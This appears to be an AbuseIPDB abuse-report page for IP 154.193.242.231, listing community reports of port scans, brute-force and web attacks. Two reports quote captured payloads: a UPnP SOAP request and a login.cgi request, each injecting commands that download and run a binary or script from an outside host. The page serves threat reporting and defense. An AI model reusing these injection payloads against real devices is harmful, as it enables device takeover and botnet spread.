JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 154.193.242.231

154.193.242.231 was found in our database!

This IP was reported 26 times. Confidence of Abuse is 100%: ?

100%

ISP	Fastmos Co Limited
Usage Type	Data Center/Web Hosting/Transit
ASN	AS154376
Domain Name	fastmos.com
Country	🇲🇾 Malaysia
City	Kuala Lumpur, Kuala Lumpur

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 154.193.242.231

Whois 154.193.242.231

IP Abuse Reports for 154.193.242.231:

This IP address has been reported a total of 26 times from 21 distinct sources. 154.193.242.231 was first reported on June 17th 2026, and the most recent report was 5 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇦🇹 urnilxfgbez	2026-06-21 22:45:00 (5 hours ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇹🇷 Squearex	2026-06-21 05:20:44 (22 hours ago)	Automated ban by SCUMUnified Shield. Honeypot Trap Triggered (Decoy Port 23)	Brute-Force SSH
🇳🇱 COMPLEX	2026-06-21 01:24:01 (1 day ago)	Unsolicited TCP traffic \| Action: DROP \| Port 52869	Brute-Force
🇺🇸 xmission.com	2026-06-20 11:25:00 (1 day ago)	Blocked by UFW (TCP on 23) Source port: 47153 TTL: 52 Packet length: 40 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 47153 TTL: 52 Packet length: 40 TOS: 0x00 This report (for 154.193.242.231) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇳🇱 VMHeaven.io	2026-06-20 11:19:51 (1 day ago)	Blocked by UFW [52869/tcp] Source port: 42801 TTL: 50 Packet length: 40	Port Scan
🇬🇧 PeravixGroup	2026-06-20 01:21:20 (2 days ago)	Honeypot detection: XML external entity (XXE) injection on port 5555. Severity: HIGH. Aaran.cloud	Web App Attack
🇬🇧 gbzret4d	2026-06-19 20:57:52 (2 days ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇯🇵 VXG-NET	2026-06-19 20:39:16 (2 days ago)	port=80, indicator_type=code-execution	Hacking
🇫🇷 security.rdmc.fr	2026-06-19 20:33:34 (2 days ago)	Port Scan Attack proto:TCP src:47153 dst:23	Port Scan
🇩🇪 barbarella	2026-06-19 18:30:44 (2 days ago)	Trying to access admin login pages: (GET /login.cgi?cli=aa%20aa%27;wget%20http://109.104.153.60/sh%2 ... show more Trying to access admin login pages: (GET /login.cgi?cli=aa%20aa%27;wget%20http://109.104.153.60/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$) show less	Web App Attack
🇩🇪 EinfxchFinn	2026-06-19 10:23:31 (2 days ago)	Unauthorized connection attempt to port 52869 from 154.193.242.231	Port Scan
🇫🇮 6kilowatti	2026-06-19 04:42:35 (2 days ago)	2026-06-19T07:42:35.104237+03:00 mummo kernel: [UFW BLOCK] IN=enp0s25 OUT= MAC=6c:62:6d:d6:a5:bc:00: ... show more 2026-06-19T07:42:35.104237+03:00 mummo kernel: [UFW BLOCK] IN=enp0s25 OUT= MAC=6c:62:6d:d6:a5:bc:00:00:5e:00:01:58:08:00 SRC=154.193.242.231 DST=83.148.240.21 LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=19731 PROTO=TCP SPT=47153 DPT=23 WINDOW=26806 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇳🇱 COMPLEX	2026-06-19 02:43:19 (3 days ago)	Unsolicited TCP traffic \| Action: DROP \| Port 52869	Brute-Force
🇩🇪 centurion	2026-06-19 00:50:09 (3 days ago)	Blocked by UFW on ns02 [52869/tcp] Source port: 42801 TTL: 45 Packet length: 40 TOS: 0x00 This repo ... show more Blocked by UFW on ns02 [52869/tcp] Source port: 42801 TTL: 45 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇬🇧 PeravixGroup	2026-06-19 00:06:55 (3 days ago)	Honeypot detection: XML external entity (XXE) injection on port 5555. Severity: HIGH. Aaran.cloud	Web App Attack

Showing 1 to 15 of 26 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇬🇧 185.247.137.26

🇳🇱 176.65.139.181

🇹🇼 128.14.237.120

🇮🇳 117.211.15.93

🇨🇳 112.51.27.82

🇵🇱 87.251.64.146

🇪🇸 81.36.95.164

🇶🇦 2600:1900:4260:40e::a7

🇮🇳 223.185.27.148

🇳🇱 193.233.127.72

🇳🇱 193.176.31.238

🇳🇱 176.65.139.36

🇺🇸 172.190.220.228

🇺🇸 142.248.80.137

🇭🇰 103.145.107.79

🇺🇸 91.230.168.109

🇩🇪 69.5.169.85

🇳🇱 50.7.127.99

🇺🇦 46.201.247.21

🇳🇱 45.148.10.39